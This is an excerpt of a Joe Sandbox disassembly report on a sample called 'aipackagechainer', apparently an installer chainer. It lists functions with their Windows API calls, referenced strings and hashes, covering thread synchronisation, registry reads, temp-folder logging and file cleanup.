API String ID: 677527491-0
Opcode ID: 66965428feb604046608fd16c0d7ba592632e233b6ad145cf026345d7991daab
Instruction ID: 425f8bf5727da572af0eb7f3ce30a1d02c56816a356e40ca39ce13986347074b
Opcode Fuzzy Hash: 66965428feb604046608fd16c0d7ba592632e233b6ad145cf026345d7991daab
Instruction Fuzzy Hash: 870184B5B00159AFDB06EB20D845ABD77B2FF85314B18401DE90157792CF386E82DBD2

Function 000C9590 Relevance: 6.0, APIs: 4, Instructions: 44synchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?), ref: 000C95C2
GetLastError.KERNEL32 ref: 000C95CC
WaitForSingleObject.KERNEL32(?,000000FF), ref: 000C95D7
GetLastError.KERNEL32 ref: 000C95E2

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$EventObjectSingleWait
String ID:
API String ID: 3600396749-0
Opcode ID: 62f53dd9c3d1e2b3edc14a217389fab03d53360be0cf70af59b7e891cc0a2706
Instruction ID: 29570f14d714bfdfcf57566d99530dc9a84186e95fe7eaad06321a2fa596cfe3
Opcode Fuzzy Hash: 62f53dd9c3d1e2b3edc14a217389fab03d53360be0cf70af59b7e891cc0a2706
Instruction Fuzzy Hash: BC017172104B418FE7218FA9D8C8F5BBBE5BF94330F148A1DE1A583660C775E850EB51

Function 000A7E10 Relevance: 6.0, APIs: 4, Instructions: 44threadsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,?,D11C52E5,?,?,?,Function_0008C250,000000FF), ref: 000A7E47
GetExitCodeThread.KERNEL32(?,?,?,?,?,Function_0008C250,000000FF), ref: 000A7E61
TerminateThread.KERNEL32(?,00000000,?,?,?,Function_0008C250,000000FF), ref: 000A7E79
CloseHandle.KERNEL32(?,?,?,?,Function_0008C250,000000FF), ref: 000A7E82

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Thread$CloseCodeExitHandleObjectSingleTerminateWait
String ID:
API String ID: 3774109050-0
Opcode ID: 5455c0b854de0b66b5020e87a785081b9792538b64c546418a36fcdf6da80b97
Instruction ID: 46570843a41afe819478e76b0ff3c217d1b455638517c31136bce6369405b14a
Opcode Fuzzy Hash: 5455c0b854de0b66b5020e87a785081b9792538b64c546418a36fcdf6da80b97
Instruction Fuzzy Hash: 59019E31504645EFEB24CF94DD04B67B7F8FB09710F008669E92992AA0EB75AC40CB50

Function 000A7EA0 Relevance: 6.0, APIs: 4, Instructions: 35threadsynchronizationCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_00047F90,?,00000000,?), ref: 000A7EC2
GetLastError.KERNEL32(?,00000000,?), ref: 000A7ECF
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,?), ref: 000A7EE3
GetExitCodeThread.KERNEL32(?,?,?,00000000,?), ref: 000A7EF1

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Thread$CodeCreateErrorExitLastObjectSingleWait
String ID:
API String ID: 2732711357-0
Opcode ID: 50e96b0d3d06305e6cc2364950f08f01223788604f77be00af23761365b4e65b
Instruction ID: 4eb8c5d1e901cfe7c812a8871422c8e565b5795a2bca8e5fd040aecb881bbb12
Opcode Fuzzy Hash: 50e96b0d3d06305e6cc2364950f08f01223788604f77be00af23761365b4e65b
Instruction Fuzzy Hash: C2F0FF71508352AFE360DFA4EC08F9BBBE8EB59710F048D1AF559D25A0DB74E844CB51

Function 000C9380 Relevance: 6.0, APIs: 4, Instructions: 32synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 000C93A5
GetLastError.KERNEL32 ref: 000C93AC
SetEvent.KERNEL32(?), ref: 000C93BD
GetLastError.KERNEL32 ref: 000C93C3

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$EventObjectSingleWait
String ID:
API String ID: 3600396749-0
Opcode ID: c4fa0c98487f0918627acd3d69fc8c4d715a401a7cc111a77f406bfca193d360
Instruction ID: 01bb99fbd36a3a130014815cd456ddf00a5400356a5bdf6192c930bb96f6372b
Opcode Fuzzy Hash: c4fa0c98487f0918627acd3d69fc8c4d715a401a7cc111a77f406bfca193d360
Instruction Fuzzy Hash: D1F082321046849BD7209BA5DC48E2EB7E4BF99330B250A2DE261835F0CF65A940EB54

Function 000EAD52 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,000E9956,00000000,00000001,00000000,00000000,?,000E0465,00000000,00000000,00000000), ref: 000EAD69
GetLastError.KERNEL32(?,000E9956,00000000,00000001,00000000,00000000,?,000E0465,00000000,00000000,00000000,00000000,00000000,?,000E09EC,00000000), ref: 000EAD75

Part of subcall function 000EAD3B: CloseHandle.KERNEL32(FFFFFFFE,000EAD85,?,000E9956,00000000,00000001,00000000,00000000,?,000E0465,00000000,00000000,00000000,00000000,00000000), ref: 000EAD4B

___initconout.LIBCMT ref: 000EAD85

Part of subcall function 000EACFD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,000EAD2C,000E9943,00000000,?,000E0465,00000000,00000000,00000000,00000000), ref: 000EAD10

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,000E9956,00000000,00000001,00000000,00000000,?,000E0465,00000000,00000000,00000000,00000000), ref: 000EAD9A

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 92176b8e53c92b3c9d0063c54838f2b3da231d7b9e5ff36d3f578ae2429d0f46
Instruction ID: eb8840707f47b1d85c19533489485fa52159597051dc35a0c206b408590252b0
Opcode Fuzzy Hash: 92176b8e53c92b3c9d0063c54838f2b3da231d7b9e5ff36d3f578ae2429d0f46
Instruction Fuzzy Hash: C0F01236504154BFDF621F93DC05A9E3F66FB09371F144010F90A95970C6329960EB91

Function 000CC8C1 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,000CC85E,00000064), ref: 000CC8E4
LeaveCriticalSection.KERNEL32(00128FDC,00000000,?,000CC85E,00000064,?,00063976,001298D8,D11C52E5,00000000,?,000EBD9D,000000FF,?,0009D1A5,D11C52E5), ref: 000CC8EE
WaitForSingleObjectEx.KERNEL32(00000000,00000000,?,000CC85E,00000064,?,00063976,001298D8,D11C52E5,00000000,?,000EBD9D,000000FF,?,0009D1A5,D11C52E5), ref: 000CC8FF
EnterCriticalSection.KERNEL32(00128FDC,?,000CC85E,00000064,?,00063976,001298D8,D11C52E5,00000000,?,000EBD9D,000000FF,?,0009D1A5,D11C52E5), ref: 000CC906

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: d96e5623b29f3aef94bd4b9ce6a741f1e635fb4ec8b9c724f431cae612048998
Instruction ID: 8d9a308c5a9124815edc37caca1b86bb17877c4880f0e4cf379ffecacd4ddb3b
Opcode Fuzzy Hash: d96e5623b29f3aef94bd4b9ce6a741f1e635fb4ec8b9c724f431cae612048998
Instruction Fuzzy Hash: 0FE09231542134BBEB112F40ED08EAF3F1AEB08B11B004025F61962970CF741861EBD5

Function 000D8A2D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 000D8ABD

Strings

pow, xrefs: 000D8A95, 000D8AB2

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 37259d38cbb8898fde39f6780e901d7e1a259ae59ef5228c5359ed143941de8a
Instruction ID: 5d21148f9ee914ac2cb58bdc77b989b2a2722f1a96b9d19481bcfc0390d252ad
Opcode Fuzzy Hash: 37259d38cbb8898fde39f6780e901d7e1a259ae59ef5228c5359ed143941de8a
Instruction Fuzzy Hash: B25199A0A082419AEB257B29CD013BE27E8EB40710F24CD5BF0D5563E9EF758CC19B57

Function 0009DDA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 160COMMON

Download Yara Rule

Strings

URL, xrefs: 0009D9C6
.url, xrefs: 0009D9CC

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID: .url$URL
API String ID: 0-2674294872
Opcode ID: f25ac6bc1ddfe4ee92a5cfce3c3165ecd0241c84606d4540db20f8c9f7ac24d1
Instruction ID: 6712fb2a717168c7593b5bad13868559b874d28c0b02af224aecc968b21bda88
Opcode Fuzzy Hash: f25ac6bc1ddfe4ee92a5cfce3c3165ecd0241c84606d4540db20f8c9f7ac24d1
Instruction Fuzzy Hash: 08519171A006459FDF10DFA8C888A9EBBF5EF48320F148269E915DB292DB34DD40DB90

Function 000668A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158COMMON

Download Yara Rule

APIs

PathIsUNCW.SHLWAPI(?,D11C52E5), ref: 00066941

Strings

\\?\UNC\, xrefs: 00066966, 000669C7
\\?\, xrefs: 00066A3A, 00066A65

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: Path
String ID: \\?\$\\?\UNC\
API String ID: 2875597873-3019864461
Opcode ID: ce88a45c106869b617c2dbdb89b7b1611d74c4a2a49630bc929386b5ae65e9bc
Instruction ID: b92f1ff0c6db7c1c3f871fdfa5cc0e49b483b262fb9ca8a8a83abbd109398aba
Opcode Fuzzy Hash: ce88a45c106869b617c2dbdb89b7b1611d74c4a2a49630bc929386b5ae65e9bc
Instruction Fuzzy Hash: A251B170D00204DBDB14DF68C895BAEB7F6FF95304F10861DE841A7281DB766948CBA1

Function 00094E60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

p1Wu, xrefs: 00095089

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID:
String ID: p1Wu
API String ID: 0-3125263879
Opcode ID: 813a6b715da2c8a6ac36a809efbf2fe0e0028e511955604a17a822c9f62656a7
Instruction ID: 205ef936d9b1c9e386b4d76edb07e15406e7655877900a8faae0f77b7bc34f1f
Opcode Fuzzy Hash: 813a6b715da2c8a6ac36a809efbf2fe0e0028e511955604a17a822c9f62656a7
Instruction Fuzzy Hash: 3F51AE30900A498FDF11DFA8C884BEEB7F1FF48325F144269E425EB292EB349945CB90

Function 00089720 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,D11C52E5), ref: 00089772
LeaveCriticalSection.KERNEL32(?,D11C52E5,?,00000000,000EBBB0,000000FF,?,80004005), ref: 000898CF

Strings

LOG, xrefs: 000897DA

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CriticalFileLeaveModuleNameSection
String ID: LOG
API String ID: 1232429956-429402703
Opcode ID: c17b2b1305a8a03fb8762824f14b6f974969d9b824a10858de9cc1c52db72e06
Instruction ID: 396af56f5abf5fe26a444e1b3974e0a164845b5517160182382f0ba7759c2ecc
Opcode Fuzzy Hash: c17b2b1305a8a03fb8762824f14b6f974969d9b824a10858de9cc1c52db72e06
Instruction Fuzzy Hash: 8E510F31A08245DFDB24BF28C805BBA77E5FF45704F18856AE84ADB681EB759A048B80

Function 000ADD00 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925

GetLastError.KERNEL32(?,00000000,00000001,08000000), ref: 000ADD84
WaitForSingleObject.KERNEL32(?,0000000A,?,00000000,00000001,08000000), ref: 000ADDBD

Strings

REST %u, xrefs: 000ADD51

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: ErrorHeapLastObjectProcessSingleWait
String ID: REST %u
API String ID: 1530046183-3183379045
Opcode ID: 81dfbec80b3ca2e4005e88744b29d8b6f9c739740164dd48520ff2c45740536c
Instruction ID: df953bccba900304dd094ed5f4818d27c89a4bcbf079f3bf3de7389c9c508889
Opcode Fuzzy Hash: 81dfbec80b3ca2e4005e88744b29d8b6f9c739740164dd48520ff2c45740536c
Instruction Fuzzy Hash: F451C431600604AFD764DFA8CC48B6AB7E5FF52324F14862AE4578FAA1DB71ED45CB40

Function 00089560 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,D11C52E5,?,?,00129AFC), ref: 0008959F
CreateDirectoryW.KERNEL32(?,00000000,?,00129AFC), ref: 00089600

Strings

ADVINST_LOGS, xrefs: 000895D8

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CreateDirectoryPathTemp
String ID: ADVINST_LOGS
API String ID: 2885754953-2492584244
Opcode ID: 4f541dc3ccd1a4cae06121f6e3c374217cd4cf93d0366515028a5d11665ea3d3
Instruction ID: 1fcc0b3b1ea3c9140737abc51456f431200a643c9362ebf466bd5bef1574aca8
Opcode Fuzzy Hash: 4f541dc3ccd1a4cae06121f6e3c374217cd4cf93d0366515028a5d11665ea3d3
Instruction Fuzzy Hash: 7351B275900219CADB70BF28C844BBAB3F4FF14714F2846AEE89997290FB754D81CB90

Function 000A52E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925

RegOpenKeyExW.ADVAPI32(?,?,00000000,0010DBD4,00000000,?,?,00000001,?), ref: 000A53BE
RegCloseKey.ADVAPI32(00000000,00000001), ref: 000A5419

Strings

hu, xrefs: 000A5419

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: CloseHeapOpenProcess
String ID: hu
API String ID: 901800290-423011080
Opcode ID: 96e85d4ff020affb4d28067dfaba0b4ee3965fcc64b136b7ed368ae74ca5c434
Instruction ID: 81a127014d9c97c792c1f184e21d4065228f235659f79b0958095a8d08116599
Opcode Fuzzy Hash: 96e85d4ff020affb4d28067dfaba0b4ee3965fcc64b136b7ed368ae74ca5c434
Instruction Fuzzy Hash: 9D516DB19006099FDB10CFA8CC48BAEBBF4FF49325F148659E421A72D1DB759A04CBA0

Function 000A5470 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118registryCOMMON

Download Yara Rule

APIs

_wcsrchr.LIBVCRUNTIME ref: 000A549F

Part of subcall function 000A5020: RegOpenKeyExW.ADVAPI32(00000000,D11C52E5,00000000,00020019,00000002,D11C52E5,00000001,00000010,00000002,000A436C,D11C52E5,00000000,00000000), ref: 000A50BC

Part of subcall function 000A0850: RegQueryValueExW.ADVAPI32(?,?,00000000,000000C8,00000000,000000C8,000000C8), ref: 000A08BE
Part of subcall function 000A0850: RegQueryValueExW.ADVAPI32(?,?,00000000,00000002,00000000,00000002,00000002,000000C8), ref: 000A0900

RegCloseKey.ADVAPI32(00000000), ref: 000A5546

Strings

hu, xrefs: 000A5546

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: QueryValue$CloseOpen_wcsrchr
String ID: hu
API String ID: 395343754-423011080
Opcode ID: e67a2a62fa6a1c7e9943d97a74730bd8c5bd78eaa46ddb04b85a5ae0e5be61ee
Instruction ID: df3c513c337ea894e22661105c24d53f946ddc8073edf2fe83393cec10ee624a
Opcode Fuzzy Hash: e67a2a62fa6a1c7e9943d97a74730bd8c5bd78eaa46ddb04b85a5ae0e5be61ee
Instruction Fuzzy Hash: AE41D131901A49DBCB10DFA8C854B9EFBB5FF46321F148269E8159B3D2D7759A04CB90

Function 000D092E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 000D0953

Strings

RCC, xrefs: 000D096D
MOC, xrefs: 000D0965

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 3242abe6cc10fa79ff756209e4c4806996d3419632d0ea85ad0b793ba1b72c36
Instruction ID: 4bc03d18b58939b1798a65b056f7b7565ea45215b8eedddbc577d2b2c801f83b
Opcode Fuzzy Hash: 3242abe6cc10fa79ff756209e4c4806996d3419632d0ea85ad0b793ba1b72c36
Instruction Fuzzy Hash: 46413572900309AFDF15DF98DC81BEEBBB5FF48300F18815AF918A6222D3359950DB61

Function 0009F510 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,D11C52E5,?,?,00000000,?,00000000,000F7806,000000FF), ref: 0009F567
RemoveDirectoryW.KERNEL32(?,D11C52E5,?,?,00000000,?,00000000,000F7806,000000FF), ref: 0009F58F

Strings

p1Wu, xrefs: 0009F567

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: DeleteDirectoryFileRemove
String ID: p1Wu
API String ID: 3325800564-3125263879
Opcode ID: 452d9bae15dd4420eec5de5c4c36fa6a9f9a7cea45632e3b4742ff069a3b56fd
Instruction ID: 1bf29d18bbf2a66e30ae6cb4aae8fedba54ddcbfed9598ad0d01a499d00299c7
Opcode Fuzzy Hash: 452d9bae15dd4420eec5de5c4c36fa6a9f9a7cea45632e3b4742ff069a3b56fd
Instruction Fuzzy Hash: FE31CE31604A45DFDB21CF68CA84B6ABBF5FF48720F1186ADE125C76A1DB70B904DB80

Function 00069080 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000690AB
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0006910E

Strings

bad locale name, xrefs: 00069131

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3988782225-1405518554
Opcode ID: 8ac85c2af2d74947a997e9382d591072e2aa48e39d953033841edc027be630d5
Instruction ID: 6c5d2f42d1da78acb4e41afa8e0a2e87f16c310812afbcc605edd909e11919e0
Opcode Fuzzy Hash: 8ac85c2af2d74947a997e9382d591072e2aa48e39d953033841edc027be630d5
Instruction Fuzzy Hash: CD21F370904784DED320CF68C904B8BBFF4AF16314F10868DE08597781D3B5AA08CB91

Function 000C9C32 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualQuery.KERNEL32(80000000,000C9B77,0000001C,000C9D6C,00000000,?,?,?,?,?,?,?,000C9B77,00000004,001287FC,000C9DFC), ref: 000C9C43
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,000C9B77,00000004,001287FC,000C9DFC), ref: 000C9C5E

Strings

D, xrefs: 000C9C52

Memory Dump Source

Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
